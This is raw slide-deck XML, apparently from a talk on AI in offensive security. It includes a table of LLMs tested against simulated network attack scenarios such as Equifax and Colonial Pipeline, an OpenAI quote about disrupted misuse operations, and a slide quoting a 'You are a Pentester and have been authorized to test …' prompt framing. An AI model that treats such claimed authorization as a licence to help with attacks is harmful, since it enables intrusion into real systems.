                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2636900530"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1694691942"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="4274446856"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1272627758"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1206034242"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="342859178"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="908550">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="934748975"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="630000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GPT4o Mini</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="0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de-AT" sz="16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endParaRPr lang="de-AT" sz="16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endParaRPr lang="de-AT" sz="16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endParaRPr lang="de-AT" sz="16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endParaRPr lang="de-AT" sz="16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958264813"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>GPT4o</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="00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de-AT" sz="16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de-AT" sz="16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de-AT" sz="16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solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="de-AT" sz="16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039422434"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gemini 1.5 Flash</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="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de-AT" sz="1600" b="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endParaRPr lang="de-AT" sz="1600" b="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274528813"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Gemini 1.5 Pro</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="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18951954"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Haiku 3.5</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="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63423934"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="630000">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="r"/>
                      <a:r>
                        <a:rPr lang="en-GB" sz="1600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Sonnet 3.5</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="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de-AT"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546305051"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1548592">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Equifax</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Col. Pip.</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4-Layer chain</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Dumbbell A</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Enterprise A</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>4-Layer Star</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Dumbbell B</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>6-Layer Star</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>6 Layer Chain</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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600" b="0" dirty="0">
                          <a:solidFill>
                            <a:sysClr val="windowText" lastClr="000000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Enterprise B</a:t>
                      </a:r>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>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9645204"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="520386">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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de-AT" sz="1600" b="0" dirty="0">
                        <a:solidFill>
                          <a:sysClr val="windowText" lastClr="000000"/>
                        </a:solidFill>
                      </a:endParaRP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7952702"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="798759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0F0B294-2DBE-11E8-B6C6-DB2EF503D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3241"/>
            <a:ext cx="12192000" cy="25654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9A47FB5A-7201-111C-D563-234ED1B94976}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1523492" y="3894209"/>
            <a:ext cx="9012324" cy="1479007"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textfeld 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E8E4D05-677E-9873-ADE2-4B0F96CCB112}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7259452" y="3406370"/>
            <a:ext cx="4932548" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(Mayoral-Vilches et al., 2025)</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Grafik 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F7513D85-1D32-FE18-E18A-ACAB43E5632A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4268289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101655C-4E93-D6D1-81C5-A5C9CC208677}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="686475" y="491687"/>
            <a:ext cx="10800000" cy="4824000"/>
          </a:xfrm>
          <a:ln w="76200">
            <a:solidFill>
              <a:schemeClr val="accent1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Since the beginning of the year, we’ve disrupted more than 20 operations and deceptive networks from around the world that attempted to use our models.</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Titel 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4F40EF9F-BFFC-CB5D-04EE-883CB0081C2E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2126475" y="5502313"/>
            <a:ext cx="9360000" cy="864000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="de-AT" dirty="0"/>
              <a:t>- OpenAI</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-AT" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-AT" sz="1800" dirty="0"/>
              <a:t>(09.10.2024)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Grafik 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B6E9DC-8919-11ED-F86C-7E1EDD2F0470}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="10480550" y="6545129"/>
            <a:ext cx="1268078" cy="268247"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3491223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385BDFDE-61CC-3600-9530-80A370B31641}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1937538" y="609944"/>
            <a:ext cx="8316924" cy="5638112"/>
            <a:chOff x="1937538" y="440668"/>
            <a:chExt cx="8316924" cy="5638112"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="6" name="Grafik 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31E289EE-9697-BF74-43FB-D1A6CC6689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1953" y="440668"/>
              <a:ext cx="4568093" cy="4568093"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Textfeld 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{55B931F6-67E8-A7AE-8A00-683B2A6BDF51}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1937538" y="4509120"/>
              <a:ext cx="8316924" cy="1569660"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="9600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx2"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>AI</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-GB" sz="9600" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>?</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72E8F3D8-1B78-167B-CD3A-15BE2138D49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2522429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A7D670E3-6D8C-265C-EE6F-2D3E710EAF1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="-4564"/>
            <a:ext cx="12191999" cy="6928656"/>
            <a:chOff x="0" y="-4564"/>
            <a:chExt cx="12191999" cy="6928656"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="7" name="Grafik 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD67DC10-22C0-0B93-204F-102C668D68BE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:srcRect l="22628" r="-1"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="6834615" y="0"/>
              <a:ext cx="5357384" cy="6924092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="8" name="Grafik 7">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B473818-FC0E-A911-2853-3285065B599A}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="-4564"/>
              <a:ext cx="6924092" cy="6924092"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9CD7B45-FCA1-D6B7-F9B1-DAD0970D1DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="5" name="Diagramm 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{468181C7-22ED-393B-2E02-80C8C07CCDA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3205531051"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="659396" y="512676"/>
          <a:ext cx="10837204" cy="57966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6953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CB326-EA0E-C11B-D8AD-7304B3EF7D8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FD1B36-E839-1123-CD7F-FA0B38DFC8A8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76200" y="1292019"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>„</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>You</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>are</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Pentester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>been</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>authorized</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> …“</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="6" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDA47C0D-9C52-C1FB-39AE-28D170D298B9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freihandform: Form 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
